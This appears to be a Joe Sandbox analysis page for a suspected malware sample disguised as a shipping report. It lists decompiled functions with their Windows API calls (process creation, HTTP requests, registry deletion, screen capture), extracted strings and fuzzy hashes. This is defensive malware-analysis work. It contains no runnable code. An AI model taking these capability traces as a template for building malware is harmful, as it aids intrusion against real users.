Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 662623871da9c1ed5701f698cb95825ac99634885a9c1fc539292690d07d86ef
Instruction ID: b613792498042a87e4445028de617023381c3c80b0d8b109650a1186ca438fc4
Opcode Fuzzy Hash: 662623871da9c1ed5701f698cb95825ac99634885a9c1fc539292690d07d86ef
Instruction Fuzzy Hash: FF4154B1D0431A6ADB20DFBA8C89C5EBFE8FF04754B50452AF11DE7681DB78A901CE91

Function 000B00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 000B00C6

Part of subcall function 000B00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0016070C,00000FA0,42812E84,?,?,?,?,000D23B3,000000FF), ref: 000B011C
Part of subcall function 000B00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,000D23B3,000000FF), ref: 000B0127
Part of subcall function 000B00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,000D23B3,000000FF), ref: 000B0138
Part of subcall function 000B00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 000B014E
Part of subcall function 000B00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 000B015C
Part of subcall function 000B00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 000B016A
Part of subcall function 000B00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000B0195
Part of subcall function 000B00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000B01A0

___scrt_fastfail.LIBCMT ref: 000B00E7

Part of subcall function 000B00A3: __onexit.LIBCMT ref: 000B00A9

Strings

SleepConditionVariableCS, xrefs: 000B0154
kernel32.dll, xrefs: 000B0133
InitializeConditionVariable, xrefs: 000B0148
api-ms-win-core-synch-l1-2-0.dll, xrefs: 000B0122
WakeAllConditionVariable, xrefs: 000B0162

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 78281c312898550bad8a79c0fb1178d28155b4df7f15e3e99e54ec721795ae23
Instruction ID: e19a7b6dc3bae6d369d497ee16c677d9fb0910658311d254cff1f2cde168df5e
Opcode Fuzzy Hash: 78281c312898550bad8a79c0fb1178d28155b4df7f15e3e99e54ec721795ae23
Instruction Fuzzy Hash: 1821FC32645715BBD7259BE8EC06BAF73E4EB09B51F000939F901A6691DB7098518AD0

Function 000F30F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 000F318D
_wcslen.LIBCMT ref: 000F31F8

Strings

REGEXPCLASS, xrefs: 000F3255, 000F3266
INSTANCE, xrefs: 000F3453
NAME, xrefs: 000F3335, 000F3346
CLASSNN, xrefs: 000F31F3, 000F3204
TEXT, xrefs: 000F347C
CLASS, xrefs: 000F3188, 000F31A5

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 9754d93c44d5877d7529e08c11ea1f74a1345eb60c7d7c1a8421520c3baf5eca
Instruction ID: 9f9641cfd6f41d840ebd1fc6b70543c7bb7d531126d434dd4368b63febc9ec53
Opcode Fuzzy Hash: 9754d93c44d5877d7529e08c11ea1f74a1345eb60c7d7c1a8421520c3baf5eca
Instruction Fuzzy Hash: 82E10732A0051A9BCB68DFB4C4517FEBBB1BF44720F148119EA56F7641DB30AF85A790

Function 001044C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0012CC08), ref: 00104527
_wcslen.LIBCMT ref: 0010453B
_wcslen.LIBCMT ref: 00104599
_wcslen.LIBCMT ref: 001045F4
_wcslen.LIBCMT ref: 0010463F
_wcslen.LIBCMT ref: 001046A7

Part of subcall function 000AF9F2: _wcslen.LIBCMT ref: 000AF9FD

GetDriveTypeW.KERNEL32(?,00156BF0,00000061), ref: 00104743

Strings

fixed, xrefs: 00104635, 0010463A
unknown, xrefs: 00104708
all, xrefs: 00104531, 00104536
ramdisk, xrefs: 001046F1
cdrom, xrefs: 0010458F, 00104594
network, xrefs: 0010469D, 001046A2
removable, xrefs: 001045EA, 001045EF

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 6b29e5e2ba0dfaf1788ffabe0b33fcc63221fd9078e75854d32601b17192888a
Instruction ID: 13682add6a9be5489293c11ba347a66ebbe9464cdda72f88ea649684f47e8087
Opcode Fuzzy Hash: 6b29e5e2ba0dfaf1788ffabe0b33fcc63221fd9078e75854d32601b17192888a
Instruction Fuzzy Hash: 1EB1DFB16083029FC714DF28C8D0AAAB7E5AFA5720F50491DF6D6C72D2E7B1D944CA92

Function 0011AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0011B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0011B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0011B1D4
_wcslen.LIBCMT ref: 0011B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0011B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0011B236
_wcslen.LIBCMT ref: 0011B332

Part of subcall function 001005A7: GetStdHandle.KERNEL32(000000F6), ref: 001005C6

_wcslen.LIBCMT ref: 0011B34B
_wcslen.LIBCMT ref: 0011B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0011B3B6
GetLastError.KERNEL32(00000000), ref: 0011B407
CloseHandle.KERNEL32(?), ref: 0011B439
CloseHandle.KERNEL32(00000000), ref: 0011B44A
CloseHandle.KERNEL32(00000000), ref: 0011B45C
CloseHandle.KERNEL32(00000000), ref: 0011B46E
CloseHandle.KERNEL32(?), ref: 0011B4E3

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 40b1d0fa13d78db36f0be88063e362fd2fbca90534bdf28af8f11315f7be3892
Instruction ID: 7a195beee77fd343b4beff69279ba2ee884b9a2c575239d913695fc347235f6b
Opcode Fuzzy Hash: 40b1d0fa13d78db36f0be88063e362fd2fbca90534bdf28af8f11315f7be3892
Instruction Fuzzy Hash: 07F18D315083409FCB18EF24C891BAEBBE5BF85314F15856DF4999B2A2DB31EC84CB52

Function 0009326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00161990), ref: 000D2F8D
GetMenuItemCount.USER32(00161990), ref: 000D303D
GetCursorPos.USER32(?), ref: 000D3081
SetForegroundWindow.USER32(00000000), ref: 000D308A
TrackPopupMenuEx.USER32(00161990,00000000,?,00000000,00000000,00000000), ref: 000D309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000D30A9

Strings

0, xrefs: 0009327D

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 9ebd7436fed883a0e5e244aa4bd4abcff65394e4f2caafaeffdd3654faad8156
Instruction ID: 86bc309546ad4c56f180bc058f54589cc4820464f9c0e2f6d186080412c7908e
Opcode Fuzzy Hash: 9ebd7436fed883a0e5e244aa4bd4abcff65394e4f2caafaeffdd3654faad8156
Instruction Fuzzy Hash: 43710871644315BEEB319F24CC49FAEBFA4FF05364F204226F614662E1C7B1A950DBA1

Function 00126CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00126DEB

Part of subcall function 00096B57: _wcslen.LIBCMT ref: 00096B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00126E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00126E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00126E94
DestroyWindow.USER32(?), ref: 00126EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00090000,00000000), ref: 00126EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00126EFD
GetDesktopWindow.USER32 ref: 00126F16
GetWindowRect.USER32(00000000), ref: 00126F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00126F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00126F4D

Part of subcall function 000A9944: GetWindowLongW.USER32(?,000000EB), ref: 000A9952

Strings

0, xrefs: 00126D98
tooltips_class32, xrefs: 00126E58, 00126EDD

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 8571405a973367866710c0a3ff9e1d70753cfe1763e70b64d804360d110f1095
Instruction ID: f2114996860e4234128a3dd6e649db9492c578c4c05e2151d71ac4c6219f6646
Opcode Fuzzy Hash: 8571405a973367866710c0a3ff9e1d70753cfe1763e70b64d804360d110f1095
Instruction Fuzzy Hash: 34717770104244AFDB21CF18EC54FAABBF9FB89304F08041DFA99972A1C770A966DF52

Function 0012911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 000A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000A9BB2

DragQueryPoint.SHELL32(?,?), ref: 00129147

Part of subcall function 00127674: ClientToScreen.USER32(?,?), ref: 0012769A
Part of subcall function 00127674: GetWindowRect.USER32(?,?), ref: 00127710
Part of subcall function 00127674: PtInRect.USER32(?,?,00128B89), ref: 00127720

SendMessageW.USER32(?,000000B0,?,?), ref: 001291B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001291BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001291DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00129225
SendMessageW.USER32(?,000000B0,?,?), ref: 0012923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00129255
SendMessageW.USER32(?,000000B1,?,?), ref: 00129277
DragFinish.SHELL32(?), ref: 0012927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00129371

Strings

@GUI_DRAGFILE, xrefs: 00129320
@GUI_DRAGID, xrefs: 001292E9
@GUI_DROPID, xrefs: 0012929E

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 82e0a566ec5024ce5169d23660c6f66ad6bdef26c262ec91475da2a3f9cb0a87
Instruction ID: 4c95637b0112e7c300b51a84ac2130abe449a9d40177e5a65183af7aac7b53c0
Opcode Fuzzy Hash: 82e0a566ec5024ce5169d23660c6f66ad6bdef26c262ec91475da2a3f9cb0a87
Instruction Fuzzy Hash: 54617971108301AFD701EF64DC85DAFBBE8FF89350F40092EF595921A1DB709A59CBA2

Function 0010C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0010C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0010C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0010C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0010C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0010C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0010C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0010C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0010C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0010C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0010C5F0
InternetCloseHandle.WININET(00000000), ref: 0010C5FB

Strings

, xrefs: 0010C575

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 50d8b54038eabea6cbb11e7d3ff0052a530135d5382487771dc4e5582819a124
Instruction ID: c3247e95f618c0f70fbabbe3f54d5f46dd0fc2e7b54a34a0b882a39f00c1f1fd
Opcode Fuzzy Hash: 50d8b54038eabea6cbb11e7d3ff0052a530135d5382487771dc4e5582819a124
Instruction Fuzzy Hash: 37516BB4600609BFDB219FA4CD88AAB7BBCFF08354F004619F985D6690DB70E9559FE0

Function 0012856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00128592
GetFileSize.KERNEL32(00000000,00000000), ref: 001285A2
GlobalAlloc.KERNEL32(00000002,00000000), ref: 001285AD
CloseHandle.KERNEL32(00000000), ref: 001285BA
GlobalLock.KERNEL32(00000000), ref: 001285C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 001285D7
GlobalUnlock.KERNEL32(00000000), ref: 001285E0
CloseHandle.KERNEL32(00000000), ref: 001285E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 001285F8
OleLoadPicture.OLEAUT32(?,00000000,00000000,0012FC38,?), ref: 00128611
GlobalFree.KERNEL32(00000000), ref: 00128621
GetObjectW.GDI32(?,00000018,000000FF), ref: 00128641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00128671
DeleteObject.GDI32(00000000), ref: 00128699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001286AF

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: fdf946f8a0a7fa2f0ec94c790ceb6c1e7c8f491a4c75d3b22798e9c5e6f53462
Instruction ID: 0943e603fb712f93d65d8d96517294a3dec43125636c97dc2bc956cb6ab37f05
Opcode Fuzzy Hash: fdf946f8a0a7fa2f0ec94c790ceb6c1e7c8f491a4c75d3b22798e9c5e6f53462
Instruction Fuzzy Hash: 0C410975601214FFDB219FA5DC48EAE7BB8FF89715F104158FA05E7260DB30A962CBA0

Function 001014BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00101502
VariantCopy.OLEAUT32(?,?), ref: 0010150B
VariantClear.OLEAUT32(?), ref: 00101517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001015FB
VarR8FromDec.OLEAUT32(?,?), ref: 00101657
VariantInit.OLEAUT32(?), ref: 00101708
SysFreeString.OLEAUT32(?), ref: 0010178C
VariantClear.OLEAUT32(?), ref: 001017D8
VariantClear.OLEAUT32(?), ref: 001017E7
VariantInit.OLEAUT32(00000000), ref: 00101823

Strings

Default, xrefs: 001016AF
%4d%02d%02d%02d%02d%02d, xrefs: 00101625

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 10837c659c491854f62f91aae01916f08605ed0d14e35ac7b26cdc276466a46f
Instruction ID: 3ad48cc0c0cbe3017d6444b0b3a97aec239321e2e0b9ec1d780544e543d48af6
Opcode Fuzzy Hash: 10837c659c491854f62f91aae01916f08605ed0d14e35ac7b26cdc276466a46f
Instruction Fuzzy Hash: 01D1F031A00605FBDB14AFA4D885BBDB7B5BF46700F11805AE486AF1C1DBB8EC45DBA1

Function 0011B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

Part of subcall function 0011C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0011B6AE,?,?), ref: 0011C9B5
Part of subcall function 0011C998: _wcslen.LIBCMT ref: 0011C9F1
Part of subcall function 0011C998: _wcslen.LIBCMT ref: 0011CA68
Part of subcall function 0011C998: _wcslen.LIBCMT ref: 0011CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0011B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0011B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0011B80A
RegCloseKey.ADVAPI32(?), ref: 0011B87E
RegCloseKey.ADVAPI32(?), ref: 0011B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0011B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0011B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0011B922
FreeLibrary.KERNEL32(00000000), ref: 0011B983
RegCloseKey.ADVAPI32(00000000), ref: 0011B994

Strings

advapi32.dll, xrefs: 0011B8ED
RegDeleteKeyExW, xrefs: 0011B8FE

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 09ba1bd2f99d0d331164e04be52fbe0ef9ba33c95d9e4ea3689c9eb9724d5ed4
Instruction ID: d761210b4dd20a3e71b886dcee51d0fcef18b828494e13a046ad5cb7925f6ec7
Opcode Fuzzy Hash: 09ba1bd2f99d0d331164e04be52fbe0ef9ba33c95d9e4ea3689c9eb9724d5ed4
Instruction Fuzzy Hash: 42C17D75208201EFD718DF14C495FAABBE5BF84308F54846CF59A4B2A2CB71ED86CB91

Function 0011255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 001125D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 001125E8
CreateCompatibleDC.GDI32(?), ref: 001125F4
SelectObject.GDI32(00000000,?), ref: 00112601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0011266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 001126AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 001126D0
SelectObject.GDI32(?,?), ref: 001126D8
DeleteObject.GDI32(?), ref: 001126E1
DeleteDC.GDI32(?), ref: 001126E8
ReleaseDC.USER32(00000000,?), ref: 001126F3

Strings

(, xrefs: 0011268D

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 311ee605129cf3a315777941aec352d0554583e3397b818acd94e6b3a11c25c0
Instruction ID: bd833abb8ef30ac03b2743e9006172a95dd47b531ff86bffd702e9931db435ad
Opcode Fuzzy Hash: 311ee605129cf3a315777941aec352d0554583e3397b818acd94e6b3a11c25c0
Instruction Fuzzy Hash: B561E375D00219EFCF14CFA4D885AAEBBB6FF48310F208529E955A7250D770A9A1CF94

Function 000CDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 000CDAA1

Part of subcall function 000CD63C: _free.LIBCMT ref: 000CD659
Part of subcall function 000CD63C: _free.LIBCMT ref: 000CD66B
Part of subcall function 000CD63C: _free.LIBCMT ref: 000CD67D
Part of subcall function 000CD63C: _free.LIBCMT ref: 000CD68F
Part of subcall function 000CD63C: _free.LIBCMT ref: 000CD6A1
